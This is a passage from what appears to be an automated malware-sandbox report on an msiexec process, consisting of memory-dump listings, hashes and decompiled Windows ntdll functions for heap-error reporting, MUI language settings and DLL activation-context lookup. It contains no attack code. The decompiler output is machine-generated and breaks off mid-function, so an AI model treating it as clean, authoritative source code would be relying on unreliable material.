                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorMode
                              • String ID:
                              • API String ID: 2340568224-0
                              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                              • Instruction ID: 52ed5765e4c12000373abab32e705205870f02dde8cd0933a419ee9aa8786a49
                              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                              • Instruction Fuzzy Hash: FBD0A7717543083BEA10FAA89C03F2672CC6B45B04F494064F949EB3C3DA60F5004161
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D4967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 34b3f4b543aabe683cf697c05f51c67298d791ead2c1b6e3534cba8e176b3a9c
                              • Instruction ID: 5dca91d77a543308ac1bf4a577ff8edc305f5515e7528dbb4a69d2b1bae381ff
                              • Opcode Fuzzy Hash: 34b3f4b543aabe683cf697c05f51c67298d791ead2c1b6e3534cba8e176b3a9c
                              • Instruction Fuzzy Hash: 02B09BB19424C5CBFB51D77146087277911B7D4745F16C055D1420651A4778D0D1F5B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 04DBB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                              Download Yara Rule
                              Strings
                              • *** An Access Violation occurred in %ws:%s, xrefs: 04DBB48F
                              • *** Inpage error in %ws:%s, xrefs: 04DBB418
                              • The instruction at %p tried to %s , xrefs: 04DBB4B6
                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04DBB323
                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04DBB47D
                              • *** Resource timeout (%p) in %ws:%s, xrefs: 04DBB352
                              • <unknown>, xrefs: 04DBB27E, 04DBB2D1, 04DBB350, 04DBB399, 04DBB417, 04DBB48E
                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04DBB3D6
                              • The resource is owned shared by %d threads, xrefs: 04DBB37E
                              • read from, xrefs: 04DBB4AD, 04DBB4B2
                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04DBB305
                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04DBB39B
                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04DBB2DC
                              • Go determine why that thread has not released the critical section., xrefs: 04DBB3C5
                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04DBB476
                              • an invalid address, %p, xrefs: 04DBB4CF
                              • a NULL pointer, xrefs: 04DBB4E0
                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04DBB2F3
                              • write to, xrefs: 04DBB4A6
                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04DBB38F
                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04DBB484
                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04DBB53F
                              • *** then kb to get the faulting stack, xrefs: 04DBB51C
                              • *** enter .cxr %p for the context, xrefs: 04DBB50D
                              • The critical section is owned by thread %p., xrefs: 04DBB3B9
                              • *** enter .exr %p for the exception record, xrefs: 04DBB4F1
                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04DBB314
                              • The resource is owned exclusively by thread %p, xrefs: 04DBB374
                              • The instruction at %p referenced memory at %p., xrefs: 04DBB432
                              • This failed because of error %Ix., xrefs: 04DBB446
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                              • API String ID: 0-108210295
                              • Opcode ID: 3c63c90b91982bbcba54d4872e5704ec8e48cce95b1f3f8a0a8fdc3607ed2c50
                              • Instruction ID: 02c95c867868287dcd41dde3dbb892e87cafa40dc1d4018ca80a036e2cee084a
                              • Opcode Fuzzy Hash: 3c63c90b91982bbcba54d4872e5704ec8e48cce95b1f3f8a0a8fdc3607ed2c50
                              • Instruction Fuzzy Hash: 2E813432B00200FFEF265E05DC45EAB3B67FF46759B404066F2475B612E269B901DAB2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DC1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                              Download Yara Rule
                              C-Code - Quality: 44%
                              			E04DC1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4ce48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04D0B150();
				} else {
					E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4df589c);
				E04D0B150("Heap error detected at %p (heap handle %p)\n",  *0x4df58a0);
				_t27 =  *0x4df5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04DC1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04D0B150();
				} else {
					E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04D0B150("Error code: %d - %s\n",  *0x4df5898);
				_t113 =  *0x4df58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D0B150();
					} else {
						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04D0B150("Parameter1: %p\n",  *0x4df58a4);
				}
				_t115 =  *0x4df58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D0B150();
					} else {
						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04D0B150("Parameter2: %p\n",  *0x4df58a8);
				}
				_t117 =  *0x4df58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D0B150();
					} else {
						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04D0B150("Parameter3: %p\n",  *0x4df58ac);
				}
				_t119 =  *0x4df58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D0B150();
					} else {
						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4df58b4);
					E04D0B150("Last known valid blocks: before - %p, after - %p\n",  *0x4df58b0);
				} else {
					_t120 =  *0x4df58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04D0B150();
				} else {
					E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04D0B150("Stack trace available at %p\n", 0x4df58c0);
			}











                              0x04dc1c10
                              0x04dc1c16
                              0x04dc1c1e
                              0x04dc1c3d
                              0x04dc1c3e
                              0x04dc1c20
                              0x04dc1c35
                              0x04dc1c3a
                              0x04dc1c44
                              0x04dc1c55
                              0x04dc1c5a
                              0x04dc1c65
                              0x04dc1c67
                              0x00000000
                              0x04dc1c6e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04dc1c67
                              0x04dc1cdc
                              0x04dc1ce5
                              0x04dc1d04
                              0x04dc1d05
                              0x04dc1ce7
                              0x04dc1cfc
                              0x04dc1d01
                              0x04dc1d0b
                              0x04dc1d17
                              0x04dc1d1f
                              0x04dc1d25
                              0x04dc1d30
                              0x04dc1d4f
                              0x04dc1d50
                              0x04dc1d32
                              0x04dc1d47
                              0x04dc1d4c
                              0x04dc1d61
                              0x04dc1d67
                              0x04dc1d68
                              0x04dc1d6e
                              0x04dc1d79
                              0x04dc1d98
                              0x04dc1d99
                              0x04dc1d7b
                              0x04dc1d90
                              0x04dc1d95
                              0x04dc1daa
                              0x04dc1db0
                              0x04dc1db1
                              0x04dc1db7
                              0x04dc1dc2
                              0x04dc1de1
                              0x04dc1de2
                              0x04dc1dc4
                              0x04dc1dd9
                              0x04dc1dde
                              0x04dc1df3
                              0x04dc1df9
                              0x04dc1dfa
                              0x04dc1e00
                              0x04dc1e0a
                              0x04dc1e13
                              0x04dc1e32
                              0x04dc1e33
                              0x04dc1e15
                              0x04dc1e2a
                              0x04dc1e2f
                              0x04dc1e39
                              0x04dc1e4a
                              0x04dc1e02
                              0x04dc1e02
                              0x04dc1e08
                              0x00000000
                              0x00000000
                              0x04dc1e08
                              0x04dc1e5b
                              0x04dc1e7a
                              0x04dc1e7b
                              0x04dc1e5d
                              0x04dc1e72
                              0x04dc1e77
                              0x04dc1e95

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                              • API String ID: 0-2897834094
                              • Opcode ID: b3cbaa4e134dcda0101d6cbe7859bd057a589fb46931cce6f18bacce83d35eef
                              • Instruction ID: 81ed5142526ed196d29a92310fc4e0f779090bee9b7dae006091a092e8ef56a6
                              • Opcode Fuzzy Hash: b3cbaa4e134dcda0101d6cbe7859bd057a589fb46931cce6f18bacce83d35eef
                              • Instruction Fuzzy Hash: 7461C432714166EFE351AB85D995A38B3E6EB04A30B49807EF50D5B352D638FC409E2A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D13D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                              Download Yara Rule
                              C-Code - Quality: 96%
                              			E04D13D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04D11B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04D11B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04D11B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04D11B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04D11B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04D24620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04D4F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04D51370(_t276, 0x4ce4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04D4BB40(0,  &_v68, _t170);
									if(L04D143C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04D4BB40(_t257,  &_v68, _t243);
								if(L04D143C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04D51370(_t278, 0x4ce4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04D24620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04D4F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04D51370(_v16, 0x4ce4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04D4BB40(_t262,  &_v68, _t244);
								if(L04D143C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04D51370(_t282, 0x4ce4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04D4BB40(_t262,  &_v68, _t201);
							if(L04D143C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04D24620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04D4F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04D51370(_t280, 0x4ce4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04D4BB40(_t267,  &_v68, _t245);
							if(L04D143C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04D51370(_t284, 0x4ce4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04D4BB40(_t267,  &_v68, _t224);
						if(L04D143C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                              0x04d13d3c
                              0x04d13d42
                              0x04d13d44
                              0x04d13d46
                              0x04d13d49
                              0x04d13d4c
                              0x04d13d4f
                              0x04d13d52
                              0x04d13d55
                              0x04d13d58
                              0x04d13d5b
                              0x04d13d5f
                              0x04d13d61
                              0x04d13d66
                              0x04d68213
                              0x04d68218
                              0x04d14085
                              0x04d14088
                              0x04d1408e
                              0x04d14094
                              0x04d1409a
                              0x04d140a0
                              0x04d140a6
                              0x04d140a9
                              0x04d140af
                              0x04d140b6
                              0x04d140bd
                              0x04d140bd
                              0x04d13d83
                              0x04d6821f
                              0x04d68229
                              0x04d68238
                              0x04d68238
                              0x04d6823d
                              0x04d6823d
                              0x04d13da0
                              0x04d13daf
                              0x04d13db5
                              0x04d13dba
                              0x04d13dba
                              0x04d13dd4
                              0x04d13e94
                              0x04d13eab
                              0x04d13f6d
                              0x04d13f84
                              0x04d1406b
                              0x04d1406b
                              0x04d1406e
                              0x04d1406e
                              0x04d14070
                              0x04d14074
                              0x04d68351
                              0x04d68351
                              0x04d1407a
                              0x04d1407f
                              0x04d6835d
                              0x04d68370
                              0x04d68377
                              0x04d68379
                              0x04d6837c
                              0x04d6837c
                              0x04d6835d
                              0x00000000
                              0x04d1407f
                              0x04d13f8a
                              0x04d13f8d
                              0x04d13f90
                              0x04d13f95
                              0x04d6830d
                              0x04d6830f
                              0x04d13f9b
                              0x04d13fac
                              0x04d13fae
                              0x04d13fb1
                              0x04d13fb1
                              0x04d13fb6
                              0x04d68317
                              0x04d6831a
                              0x00000000
                              0x04d13fbc
                              0x04d13fc1
                              0x04d13fc9
                              0x04d13fd7
                              0x04d13fda
                              0x04d13fdd
                              0x04d14021
                              0x04d14021
                              0x04d14029
                              0x04d14030
                              0x04d14044
                              0x04d14046
                              0x04d14046
                              0x04d14044
                              0x04d14049
                              0x04d68327
                              0x04d68334
                              0x04d68339
                              0x04d6833c
                              0x04d1404f
                              0x04d1404f
                              0x04d1404f
                              0x04d14051
                              0x04d14056
                              0x04d14063
                              0x04d14063
                              0x04d14068
                              0x00000000
                              0x04d14068
                              0x04d13fdf
                              0x04d13fe2
                              0x04d13fe4
                              0x04d13fe7
                              0x04d13fef
                              0x04d14003
                              0x04d14005
                              0x04d14005
                              0x04d1400c
                              0x04d14013
                              0x04d14016
                              0x04d14017
                              0x04d1401b
                              0x04d1401e
                              0x00000000
                              0x04d1401e
                              0x04d13fb6
                              0x04d13eb1
                              0x04d13eb4
                              0x04d13eb7
                              0x04d13ebc
                              0x04d682a9
                              0x04d682ab
                              0x04d13ec2
                              0x04d13ed3
                              0x04d13ed5
                              0x04d13ed8
                              0x04d13ed8
                              0x04d13edd
                              0x04d682b3
                              0x04d682b6
                              0x00000000
                              0x04d13ee3
                              0x04d13ee8
                              0x04d13eed
                              0x04d13ef0
                              0x04d13ef3
                              0x04d13f02
                              0x04d13f05
                              0x04d13f08
                              0x04d682c0
                              0x04d682c3
                              0x04d682c5
                              0x04d682c8
                              0x04d682d0
                              0x04d682e4
                              0x04d682e6
                              0x04d682e6
                              0x04d682ed
                              0x04d682f4
                              0x04d682f7
                              0x04d682f8
                              0x04d682fc
                              0x04d682ff
                              0x04d682ff
                              0x04d13f0e
                              0x04d13f11
                              0x04d13f16
                              0x04d13f1d
                              0x04d13f31
                              0x04d68307
                              0x04d68307
                              0x04d13f31
                              0x04d13f39
                              0x04d13f48
                              0x04d13f4d
                              0x04d13f50
                              0x04d13f50
                              0x04d13f53
                              0x04d13f58
                              0x04d13f65
                              0x04d13f65
                              0x04d13f6a
                              0x00000000
                              0x04d13f6a
                              0x04d13edd
                              0x04d13dda
                              0x04d13ddd
                              0x04d13de0
                              0x04d13de5
                              0x04d68245
                              0x04d13deb
                              0x04d13df7
                              0x04d13dfc
                              0x04d13dfe
                              0x04d13e01
                              0x04d13e01
                              0x04d13e06
                              0x04d6824d
                              0x04d6824f
                              0x04d68254
                              0x00000000
                              0x04d13e0c
                              0x04d13e11
                              0x04d13e16
                              0x04d13e19
                              0x04d13e29
                              0x04d13e2c
                              0x04d13e2f
                              0x04d6825c
                              0x04d6825f
                              0x04d68261
                              0x04d68264
                              0x04d6826c
                              0x04d68280
                              0x04d68282
                              0x04d68282
                              0x04d68289
                              0x04d68290
                              0x04d68293
                              0x04d68294
                              0x04d68298
                              0x04d6829b
                              0x04d6829b
                              0x04d13e35
                              0x04d13e38
                              0x04d13e3d
                              0x04d13e44
                              0x04d13e58
                              0x04d682a3
                              0x04d682a3
                              0x04d13e58
                              0x04d13e60
                              0x04d13e6f
                              0x04d13e74
                              0x04d13e77
                              0x04d13e77
                              0x04d13e7a
                              0x04d13e7f
                              0x04d13e8c
                              0x04d13e8c
                              0x04d13e91
                              0x00000000
                              0x04d13e91

                              Strings
                              • Kernel-MUI-Language-Disallowed, xrefs: 04D13E97
                              • WindowsExcludedProcs, xrefs: 04D13D6F
                              • Kernel-MUI-Number-Allowed, xrefs: 04D13D8C
                              • Kernel-MUI-Language-SKU, xrefs: 04D13F70
                              • Kernel-MUI-Language-Allowed, xrefs: 04D13DC0
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                              • API String ID: 0-258546922
                              • Opcode ID: d1de1fc8c140969dae31ba917aa62d84ad707690a75461382dc174fad7021c75
                              • Instruction ID: 4d5b5419afee154e9080602a5013f6f600fc66823f6d4b5e195bcdd03ff12526
                              • Opcode Fuzzy Hash: d1de1fc8c140969dae31ba917aa62d84ad707690a75461382dc174fad7021c75
                              • Instruction Fuzzy Hash: C6F13F71E01618EFDF15DF99D980AEEB7B9FF48754F14015AE905A7220E730AE01DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D38E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                              Download Yara Rule
                              C-Code - Quality: 44%
                              			E04D38E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4dfd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4df8464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4df5780 & 0x00000003) != 0) {
							E04D85510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4df5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E04D4B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4df7984; // 0x3052bc8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
